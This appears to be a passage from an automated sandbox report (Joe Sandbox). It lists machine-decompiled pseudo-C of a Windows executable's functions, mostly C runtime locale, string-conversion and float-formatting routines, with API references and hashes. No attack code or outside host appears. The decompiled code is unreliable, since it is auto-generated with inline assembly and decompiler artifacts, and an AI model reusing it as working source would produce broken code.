                                                                                                • Part of subcall function 00407393: InterlockedIncrement.KERNEL32(?), ref: 004073A2
                                                                                                • Part of subcall function 00407393: InterlockedIncrement.KERNEL32(?), ref: 004073AF
                                                                                                • Part of subcall function 00407393: InterlockedIncrement.KERNEL32(?), ref: 004073BC
                                                                                                • Part of subcall function 00407393: InterlockedIncrement.KERNEL32(?), ref: 004073C9
                                                                                                • Part of subcall function 00407393: InterlockedIncrement.KERNEL32(?), ref: 004073D6
                                                                                                • Part of subcall function 00407393: InterlockedIncrement.KERNEL32(?), ref: 004073EE
                                                                                                • Part of subcall function 00407393: InterlockedIncrement.KERNEL32(00000000), ref: 004073FE
                                                                                                • Part of subcall function 00407393: InterlockedIncrement.KERNEL32(?), ref: 00407412
                                                                                              • ___removelocaleref.LIBCMT ref: 004074C2
                                                                                                • Part of subcall function 00407419: InterlockedDecrement.KERNEL32(cx@), ref: 0040742C
                                                                                                • Part of subcall function 00407419: InterlockedDecrement.KERNEL32(?), ref: 00407439
                                                                                                • Part of subcall function 00407419: InterlockedDecrement.KERNEL32(?), ref: 00407446
                                                                                                • Part of subcall function 00407419: InterlockedDecrement.KERNEL32(?), ref: 00407453
                                                                                                • Part of subcall function 00407419: InterlockedDecrement.KERNEL32(?), ref: 00407460
                                                                                                • Part of subcall function 00407419: InterlockedDecrement.KERNEL32(?), ref: 00407478
                                                                                                • Part of subcall function 00407419: InterlockedDecrement.KERNEL32(00000000), ref: 00407488
                                                                                                • Part of subcall function 00407419: InterlockedDecrement.KERNEL32(?), ref: 0040749C
                                                                                              • ___freetlocinfo.LIBCMT ref: 004074D6
                                                                                                • Part of subcall function 00407253: ___free_lconv_mon.LIBCMT ref: 00407296
                                                                                                • Part of subcall function 00407253: ___free_lconv_num.LIBCMT ref: 004072B7
                                                                                                • Part of subcall function 00407253: ___free_lc_time.LIBCMT ref: 0040733C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                                                              • String ID: P,A
                                                                                              • API String ID: 467427115-2870471946
                                                                                              • Opcode ID: b19b2794a126d951227df7c42bf3f575d5550b3ed6c316ea389c7c6f5735ff07
                                                                                              • Instruction ID: 22d2e1a64df7eb9c4b3149ee82772dad016b66ab0b5269ce4b6633f909c0191c
                                                                                              • Opcode Fuzzy Hash: b19b2794a126d951227df7c42bf3f575d5550b3ed6c316ea389c7c6f5735ff07
                                                                                              • Instruction Fuzzy Hash: 76E0D832D094211DCA313519184025B6A440FC1359B29807FFC94F76D1EB7C7C80C1BF
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 65%
                                                                                              			E0040C71F() {
                                                                                              				signed long long _v12;
                                                                                              				signed int _v20;
                                                                                              				signed long long _v28;
                                                                                              				signed char _t8;
                                                                                              
                                                                                              				_t8 = GetModuleHandleA("KERNEL32");
                                                                                              				if(_t8 == 0) {
                                                                                              					L6:
                                                                                              					_v20 =  *0x410d48;
                                                                                              					_v28 =  *0x410d40;
                                                                                              					asm("fsubr qword [ebp-0x18]");
                                                                                              					_v12 = _v28 / _v20 * _v20;
                                                                                              					asm("fld1");
                                                                                              					asm("fcomp qword [ebp-0x8]");
                                                                                              					asm("fnstsw ax");
                                                                                              					if((_t8 & 0x00000005) != 0) {
                                                                                              						return 0;
                                                                                              					} else {
                                                                                              						return 1;
                                                                                              					}
                                                                                              				} else {
                                                                                              					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                              					if(__eax == 0) {
                                                                                              						goto L6;
                                                                                              					} else {
                                                                                              						_push(0);
                                                                                              						return __eax;
                                                                                              					}
                                                                                              				}
                                                                                              			}







                                                                                              0x0040c724
                                                                                              0x0040c72c
                                                                                              0x0040c743
                                                                                              0x0040c6ef
                                                                                              0x0040c6f8
                                                                                              0x0040c704
                                                                                              0x0040c707
                                                                                              0x0040c70a
                                                                                              0x0040c70c
                                                                                              0x0040c70f
                                                                                              0x0040c714
                                                                                              0x0040c71e
                                                                                              0x0040c716
                                                                                              0x0040c71a
                                                                                              0x0040c71a
                                                                                              0x0040c72e
                                                                                              0x0040c734
                                                                                              0x0040c73c
                                                                                              0x00000000
                                                                                              0x0040c73e
                                                                                              0x0040c73e
                                                                                              0x0040c742
                                                                                              0x0040c742
                                                                                              0x0040c73c

                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,0040AF13), ref: 0040C724
                                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040C734
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                              • API String ID: 1646373207-3105848591
                                                                                              • Opcode ID: 7e9898785a4810d1af45d99c99132ee739b3e48682ce07245d81085881ce17b3
                                                                                              • Instruction ID: b1b15d38351befa2f245556bd40d098d3dbd5c6af30f7ecde061995d18c1764a
                                                                                              • Opcode Fuzzy Hash: 7e9898785a4810d1af45d99c99132ee739b3e48682ce07245d81085881ce17b3
                                                                                              • Instruction Fuzzy Hash: 55C01230740201D1DA3017B16C8DB1A25641B00B01F1455327809F21E0DBB8D284543E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00409E47(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                              				char _v8;
                                                                                              				signed int _v12;
                                                                                              				char _v20;
                                                                                              				void* __ebx;
                                                                                              				char _t43;
                                                                                              				char _t46;
                                                                                              				signed int _t53;
                                                                                              				signed int _t54;
                                                                                              				intOrPtr _t56;
                                                                                              				intOrPtr _t57;
                                                                                              				int _t58;
                                                                                              				signed short* _t59;
                                                                                              				short* _t60;
                                                                                              				int _t65;
                                                                                              				char* _t71;
                                                                                              
                                                                                              				_t71 = _a8;
                                                                                              				if(_t71 == 0 || _a12 == 0) {
                                                                                              					L5:
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					if( *_t71 != 0) {
                                                                                              						E00403ED8(0,  &_v20, _a16);
                                                                                              						_t43 = _v20;
                                                                                              						__eflags =  *(_t43 + 0x14);
                                                                                              						if( *(_t43 + 0x14) != 0) {
                                                                                              							_t46 = E00407852( *_t71 & 0x000000ff,  &_v20);
                                                                                              							__eflags = _t46;
                                                                                              							if(_t46 == 0) {
                                                                                              								__eflags = _a4;
                                                                                              								_t40 = _v20 + 4; // 0x840ffff8
                                                                                              								__eflags = MultiByteToWideChar( *_t40, 9, _t71, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                              								if(__eflags != 0) {
                                                                                              									L10:
                                                                                              									__eflags = _v8;
                                                                                              									if(_v8 != 0) {
                                                                                              										_t53 = _v12;
                                                                                              										_t11 = _t53 + 0x70;
                                                                                              										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                              										__eflags =  *_t11;
                                                                                              									}
                                                                                              									return 1;
                                                                                              								}
                                                                                              								L21:
                                                                                              								_t54 = E0040233D(__eflags);
                                                                                              								 *_t54 = 0x2a;
                                                                                              								__eflags = _v8;
                                                                                              								if(_v8 != 0) {
                                                                                              									_t54 = _v12;
                                                                                              									_t33 = _t54 + 0x70;
                                                                                              									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                              									__eflags =  *_t33;
                                                                                              								}
                                                                                              								return _t54 | 0xffffffff;
                                                                                              							}
                                                                                              							_t56 = _v20;
                                                                                              							_t15 = _t56 + 0xac; // 0xa045ff98
                                                                                              							_t65 =  *_t15;
                                                                                              							__eflags = _t65 - 1;
                                                                                              							if(_t65 <= 1) {
                                                                                              								L17:
                                                                                              								_t24 = _t56 + 0xac; // 0xa045ff98
                                                                                              								__eflags = _a12 -  *_t24;
                                                                                              								if(__eflags < 0) {
                                                                                              									goto L21;
                                                                                              								}
                                                                                              								__eflags = _t71[1];
                                                                                              								if(__eflags == 0) {
                                                                                              									goto L21;
                                                                                              								}
                                                                                              								L19:
                                                                                              								__eflags = _v8;
                                                                                              								_t27 = _t56 + 0xac; // 0xa045ff98
                                                                                              								_t57 =  *_t27;
                                                                                              								if(_v8 == 0) {
                                                                                              									return _t57;
                                                                                              								}
                                                                                              								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                              								return _t57;
                                                                                              							}
                                                                                              							__eflags = _a12 - _t65;
                                                                                              							if(_a12 < _t65) {
                                                                                              								goto L17;
                                                                                              							}
                                                                                              							__eflags = _a4;
                                                                                              							_t21 = _t56 + 4; // 0x840ffff8
                                                                                              							_t58 = MultiByteToWideChar( *_t21, 9, _t71, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                              							__eflags = _t58;
                                                                                              							_t56 = _v20;
                                                                                              							if(_t58 != 0) {
                                                                                              								goto L19;
                                                                                              							}
                                                                                              							goto L17;
                                                                                              						}
                                                                                              						_t59 = _a4;
                                                                                              						__eflags = _t59;
                                                                                              						if(_t59 != 0) {
                                                                                              							 *_t59 =  *_t71 & 0x000000ff;
                                                                                              						}
                                                                                              						goto L10;
                                                                                              					} else {
                                                                                              						_t60 = _a4;
                                                                                              						if(_t60 != 0) {
                                                                                              							 *_t60 = 0;
                                                                                              						}
                                                                                              						goto L5;
                                                                                              					}
                                                                                              				}
                                                                                              			}


















                                                                                              0x00409e4f
                                                                                              0x00409e56
                                                                                              0x00409e6b
                                                                                              0x00000000
                                                                                              0x00409e5d
                                                                                              0x00409e5f
                                                                                              0x00409e77
                                                                                              0x00409e7c
                                                                                              0x00409e7f
                                                                                              0x00409e82
                                                                                              0x00409eab
                                                                                              0x00409eb0
                                                                                              0x00409eb4
                                                                                              0x00409f35
                                                                                              0x00409f47
                                                                                              0x00409f50
                                                                                              0x00409f52
                                                                                              0x00409e92
                                                                                              0x00409e92
                                                                                              0x00409e95
                                                                                              0x00409e97
                                                                                              0x00409e9a
                                                                                              0x00409e9a
                                                                                              0x00409e9a
                                                                                              0x00409e9a
                                                                                              0x00000000
                                                                                              0x00409ea0
                                                                                              0x00409f14
                                                                                              0x00409f14
                                                                                              0x00409f19
                                                                                              0x00409f1f
                                                                                              0x00409f22
                                                                                              0x00409f24
                                                                                              0x00409f27
                                                                                              0x00409f27
                                                                                              0x00409f27
                                                                                              0x00409f27
                                                                                              0x00000000
                                                                                              0x00409f2b
                                                                                              0x00409eb6
                                                                                              0x00409eb9
                                                                                              0x00409eb9
                                                                                              0x00409ebf
                                                                                              0x00409ec2
                                                                                              0x00409ee9
                                                                                              0x00409eec
                                                                                              0x00409eec
                                                                                              0x00409ef2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409ef4
                                                                                              0x00409ef7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409ef9
                                                                                              0x00409ef9
                                                                                              0x00409efc
                                                                                              0x00409efc
                                                                                              0x00409f02
                                                                                              0x00409e70
                                                                                              0x00409e70
                                                                                              0x00409f0b
                                                                                              0x00000000
                                                                                              0x00409f0b
                                                                                              0x00409ec4
                                                                                              0x00409ec7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409ecb
                                                                                              0x00409ed9
                                                                                              0x00409edc
                                                                                              0x00409ee2
                                                                                              0x00409ee4
                                                                                              0x00409ee7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409ee7
                                                                                              0x00409e84
                                                                                              0x00409e87
                                                                                              0x00409e89
                                                                                              0x00409e8f
                                                                                              0x00409e8f
                                                                                              0x00000000
                                                                                              0x00409e61
                                                                                              0x00409e61
                                                                                              0x00409e66
                                                                                              0x00409e68
                                                                                              0x00409e68
                                                                                              0x00000000
                                                                                              0x00409e66
                                                                                              0x00409e5f

                                                                                              APIs
                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00409E77
                                                                                              • __isleadbyte_l.LIBCMT ref: 00409EAB
                                                                                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,004087A5,?,?,00000002), ref: 00409EDC
                                                                                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,004087A5,?,?,00000002), ref: 00409F4A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 3058430110-0
                                                                                              • Opcode ID: d73820ec5f0587733eb2be299ea06b2c220631c50ab18c384374e21595c0cbe0
                                                                                              • Instruction ID: 3aad6ba8bd0ca2f0f88bf9a960cc336d5ce92ca5862ab9c5e25732cc83272faa
                                                                                              • Opcode Fuzzy Hash: d73820ec5f0587733eb2be299ea06b2c220631c50ab18c384374e21595c0cbe0
                                                                                              • Instruction Fuzzy Hash: 6D319E31A04246EFDB20DF64CC84AAA7BA4BF01311F1485BAE461AB2E3D3349D40DB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040C613(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                              				intOrPtr _t25;
                                                                                              				void* _t26;
                                                                                              				void* _t28;
                                                                                              				void* _t29;
                                                                                              
                                                                                              				_t28 = __ebx;
                                                                                              				_t25 = _a16;
                                                                                              				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                              					_t26 = E0040BF10(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                              					goto L9;
                                                                                              				} else {
                                                                                              					_t35 = _t25 - 0x66;
                                                                                              					if(_t25 != 0x66) {
                                                                                              						__eflags = _t25 - 0x61;
                                                                                              						if(_t25 == 0x61) {
                                                                                              							L7:
                                                                                              							_t26 = E0040BFFC(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                              						} else {
                                                                                              							__eflags = _t25 - 0x41;
                                                                                              							if(__eflags == 0) {
                                                                                              								goto L7;
                                                                                              							} else {
                                                                                              								_t26 = E0040C51B(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                              							}
                                                                                              						}
                                                                                              						L9:
                                                                                              						return _t26;
                                                                                              					} else {
                                                                                              						return E0040C462(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
                                                                                              					}
                                                                                              				}
                                                                                              			}







                                                                                              0x0040c613
                                                                                              0x0040c616
                                                                                              0x0040c61c
                                                                                              0x0040c68f
                                                                                              0x00000000
                                                                                              0x0040c623
                                                                                              0x0040c623
                                                                                              0x0040c626
                                                                                              0x0040c641
                                                                                              0x0040c644
                                                                                              0x0040c664
                                                                                              0x0040c676
                                                                                              0x0040c646
                                                                                              0x0040c646
                                                                                              0x0040c649
                                                                                              0x00000000
                                                                                              0x0040c64b
                                                                                              0x0040c65d
                                                                                              0x0040c65d
                                                                                              0x0040c649
                                                                                              0x0040c694
                                                                                              0x0040c698
                                                                                              0x0040c628
                                                                                              0x0040c640
                                                                                              0x0040c640
                                                                                              0x0040c626

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                              • String ID:
                                                                                              • API String ID: 3016257755-0
                                                                                              • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                              • Instruction ID: f5ab66f1bb8206d26ba566a98343b7e05f74b832bbdd63b4cd8d0c22fe8ea816
                                                                                              • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                              • Instruction Fuzzy Hash: 8901633200014AFBCF225F94CC41CEE3F26BB19344B048A26FA1865161C73BC5B1AF89
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 25%
                                                                                              			E00401000(void* __ecx, char* _a4) {
                                                                                              				short* _v8;
                                                                                              				int _v12;
                                                                                              				short* _t10;
                                                                                              				int _t11;
                                                                                              				short* _t13;
                                                                                              				int _t21;
                                                                                              
                                                                                              				if(_a4 == 0) {
                                                                                              					L4:
                                                                                              					_t10 = 0;
                                                                                              				} else {
                                                                                              					_t11 =  *0x412fb0();
                                                                                              					_v12 = _t11;
                                                                                              					_t21 = MultiByteToWideChar(_t11, 0, _a4, 0xffffffff, 0, 0);
                                                                                              					_t4 = _t21 - 1; // -1
                                                                                              					_t13 = _t4;
                                                                                              					__imp__#4(0, _t13);
                                                                                              					_v8 = _t13;
                                                                                              					if(_t13 == 0 || MultiByteToWideChar(_v12, 0, _a4, 0xffffffff, _t13, _t21) == _t21) {
                                                                                              						_t10 = _v8;
                                                                                              					} else {
                                                                                              						__imp__#6(_v8);
                                                                                              						goto L4;
                                                                                              					}
                                                                                              				}
                                                                                              				return _t10;
                                                                                              			}









                                                                                              0x0040100d
                                                                                              0x00401057
                                                                                              0x00401057
                                                                                              0x0040100f
                                                                                              0x0040100f
                                                                                              0x00401022
                                                                                              0x00401029
                                                                                              0x0040102b
                                                                                              0x0040102b
                                                                                              0x00401030
                                                                                              0x00401038
                                                                                              0x0040103b
                                                                                              0x0040105e
                                                                                              0x0040104e
                                                                                              0x00401051
                                                                                              0x00000000
                                                                                              0x00401051
                                                                                              0x0040103b
                                                                                              0x0040105d

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401027
                                                                                              • SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 00401030
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 00401048
                                                                                              • SysFreeString.OLEAUT32(?), ref: 00401051
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiStringWide$AllocFree
                                                                                              • String ID:
                                                                                              • API String ID: 447844807-0
                                                                                              • Opcode ID: 63d608467a2cd9dfe0ca9f9c8d200848611d0feb675366d0f9329567f1f74763
                                                                                              • Instruction ID: 37c1924c2a1017a701e387fc08da7db3224372094136aeba860cf8a5a64b523b
                                                                                              • Opcode Fuzzy Hash: 63d608467a2cd9dfe0ca9f9c8d200848611d0feb675366d0f9329567f1f74763
                                                                                              • Instruction Fuzzy Hash: CB018CB150410CFFDB119FA4CD84CAFBBBDEB453A4B204236F502E26A0D6719E809B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 90%
                                                                                              			E004074E3(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _t13;
                                                                                              				intOrPtr _t28;
                                                                                              				void* _t29;
                                                                                              				void* _t30;
                                                                                              
                                                                                              				_t30 = __eflags;
                                                                                              				_t26 = __edi;
                                                                                              				_t25 = __edx;
                                                                                              				_t22 = __ebx;
                                                                                              				_push(0xc);
                                                                                              				_push(0x4112f8);
                                                                                              				E004030DC(__ebx, __edi, __esi);
                                                                                              				_t28 = E004059B3(__edx, __edi, _t30);
                                                                                              				_t13 =  *0x412c44; // 0xfffffffe
                                                                                              				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                              					L6:
                                                                                              					E004025AC(0xc);
                                                                                              					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                              					_t8 = _t28 + 0x6c; // 0x6c
                                                                                              					_t26 =  *0x412d28; // 0x412c50
                                                                                              					 *((intOrPtr*)(_t29 - 0x1c)) = E004074A5(_t8, _t26);
                                                                                              					 *(_t29 - 4) = 0xfffffffe;
                                                                                              					E0040754D();
                                                                                              				} else {
                                                                                              					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                              					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                              						goto L6;
                                                                                              					} else {
                                                                                              						_t28 =  *((intOrPtr*)(E004059B3(__edx, _t26, _t32) + 0x6c));
                                                                                              					}
                                                                                              				}
                                                                                              				if(_t28 == 0) {
                                                                                              					E00404993(_t22, _t25, _t26, 0x20);
                                                                                              				}
                                                                                              				return E00403121(_t28);
                                                                                              			}







                                                                                              0x004074e3
                                                                                              0x004074e3
                                                                                              0x004074e3
                                                                                              0x004074e3
                                                                                              0x004074e3
                                                                                              0x004074e5
                                                                                              0x004074ea
                                                                                              0x004074f4
                                                                                              0x004074f6
                                                                                              0x004074fe
                                                                                              0x00407522
                                                                                              0x00407524
                                                                                              0x0040752a
                                                                                              0x0040752e
                                                                                              0x00407531
                                                                                              0x0040753c
                                                                                              0x0040753f
                                                                                              0x00407546
                                                                                              0x00407500
                                                                                              0x00407500
                                                                                              0x00407504
                                                                                              0x00000000
                                                                                              0x00407506
                                                                                              0x0040750b
                                                                                              0x0040750b
                                                                                              0x00407504
                                                                                              0x00407510
                                                                                              0x00407514
                                                                                              0x00407519
                                                                                              0x00407521

                                                                                              APIs
                                                                                                • Part of subcall function 004059B3: __getptd_noexit.LIBCMT ref: 004059B4
                                                                                                • Part of subcall function 004059B3: __amsg_exit.LIBCMT ref: 004059C1
                                                                                              • __amsg_exit.LIBCMT ref: 00407514
                                                                                              • __lock.LIBCMT ref: 00407524
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: __amsg_exit$__getptd_noexit__lock
                                                                                              • String ID: P,A
                                                                                              • API String ID: 4164267342-2870471946
                                                                                              • Opcode ID: 4aeaf44935ee90ca9b3e929a56e70a3fa7272817e97415236ace8b4e14aff32f
                                                                                              • Instruction ID: 8fbfb3b8f7449b25c88c643bfaa27039b24aeeb38a09b268eabb314161782af1
                                                                                              • Opcode Fuzzy Hash: 4aeaf44935ee90ca9b3e929a56e70a3fa7272817e97415236ace8b4e14aff32f
                                                                                              • Instruction Fuzzy Hash: 72F0AF71E05700AAE320EF75890278E73A0AB40329F10457FA140B66D1CA7CAA01CE9E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 93%
                                                                                              			E004010D7(void* __ebx, void* __edx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                                                              				intOrPtr* _t19;
                                                                                              				intOrPtr* _t21;
                                                                                              				void* _t22;
                                                                                              				void* _t23;
                                                                                              
                                                                                              				_t23 = __eflags;
                                                                                              				_t19 = __edi;
                                                                                              				_push(4);
                                                                                              				E0040C748(E0040EDA5, __ebx, __edi, __esi);
                                                                                              				_t21 = E00401DE6(__ebx, __edx, __edi, __esi, _t23, 0xc);
                                                                                              				 *((intOrPtr*)(_t22 - 0x10)) = _t21;
                                                                                              				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
                                                                                              				if(_t21 == 0) {
                                                                                              					_t21 = 0;
                                                                                              					__eflags = 0;
                                                                                              				} else {
                                                                                              					 *(_t21 + 4) =  *(_t21 + 4) & 0x00000000;
                                                                                              					 *((intOrPtr*)(_t21 + 8)) = 1;
                                                                                              					 *_t21 = E0040A860(__edx, "GET");
                                                                                              				}
                                                                                              				 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
                                                                                              				 *_t19 = _t21;
                                                                                              				if(_t21 == 0) {
                                                                                              					E0040A7D0(0x8007000e);
                                                                                              				}
                                                                                              				return E0040C7E7(_t19);
                                                                                              			}







                                                                                              0x004010d7
                                                                                              0x004010d7
                                                                                              0x004010d7
                                                                                              0x004010de
                                                                                              0x004010ea
                                                                                              0x004010ed
                                                                                              0x004010f0
                                                                                              0x004010f6
                                                                                              0x00401111
                                                                                              0x00401111
                                                                                              0x004010f8
                                                                                              0x004010f8
                                                                                              0x00401101
                                                                                              0x0040110d
                                                                                              0x0040110d
                                                                                              0x00401113
                                                                                              0x00401119
                                                                                              0x0040111b
                                                                                              0x00401122
                                                                                              0x00401122
                                                                                              0x0040112e

                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 004010DE
                                                                                                • Part of subcall function 00401DE6: _malloc.LIBCMT ref: 00401DFE
                                                                                              • _com_util::ConvertStringToBSTR.COMSUPP ref: 00401108
                                                                                                • Part of subcall function 0040A860: lstrlenA.KERNEL32(00000004,C28B62E0,?,00000000,00000000,000000FE,?,0040110D,GET,00000004,0040169F), ref: 0040A89E
                                                                                                • Part of subcall function 0040A860: MultiByteToWideChar.KERNEL32(00000000,00000000,00000004,-00000001,00000000,00000000,?,0040110D,GET,00000004,0040169F), ref: 0040A8B6
                                                                                                • Part of subcall function 0040A860: GetLastError.KERNEL32(?,?,?,0040110D,GET,00000004), ref: 0040A8CB
                                                                                                • Part of subcall function 0040A860: GetLastError.KERNEL32(?,?,?,0040110D,GET,00000004), ref: 0040A8D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
